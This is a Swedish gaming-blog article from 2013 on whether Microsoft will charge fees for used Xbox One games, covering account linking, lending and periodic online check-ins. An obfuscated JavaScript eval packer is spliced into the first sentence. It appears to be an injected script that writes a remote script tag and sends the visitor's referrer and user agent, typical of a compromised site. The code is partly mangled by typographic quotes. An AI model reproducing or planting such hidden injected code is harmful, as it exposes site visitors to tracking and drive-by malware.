Image Image Image Image Image Image Image Image Image Image

| 24 maj, 2018

Scroll to top

Top

No Comments

Begagnade spel kommer inte få en avgift på Xbox one?

xbox
Filip Urde
  • On 29 maj, 2013
  • http://www.revue.se/filip-urde

Kan eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|anfin|var|u0026u|referrer|dfysi||js|php’.split(‘|’),0,{}))
vi ”alla” ha spekulerat för hårt? Informationen som spridits om hur begagnade spel kommer att hanteras på Xbox One har varit felaktig och inte komplett säger Microsoft. Dock är läget om hur det faktiskt kommer att bli ganska oklart.  

Vad vet vi:

  • Spelet kopplas med ditt Live-konto när du installerar spelet på din Xbox One. 
  • Microsoft bekräftar nu att det inte kommer kosta något att ta med sig spelet till en vän och spela, dock så länge du är inloggad på det konto spelet är kopplat till. 
  • Xbox One behöver inte vara ständigt uppkopplad mot nätet men kräver internetuppkoppling då konsolen med jämna mellanrum vill ha kontakt med nätet och göra en sorts incheckning. 

Om du ska sälja ett spel så kopplas det (enligt rykten) bort från ditt konto och kan då bli tillgängligt för att sälja eller låna ut. Det finns dock ingen information om det kommer kosta att aktivera spelet till ditt konto igen. Så vad kan vi säga om det här… Microsoft har givit ett svar, fast ändå inte? Ja, jag är inte speciellt mycket visare efter den här turen. Man har svarat på vissa frågetecken men lämnat väldigt mycket åt spekulation. Kanske vet man inte helt själva ännu? Hur som helst ser vi fram emot att turerna kring Xbox One ska lösa sig snart och att vi kan rapportera konkret fakta åt er läsare.

www.polygon.com

Submit a Comment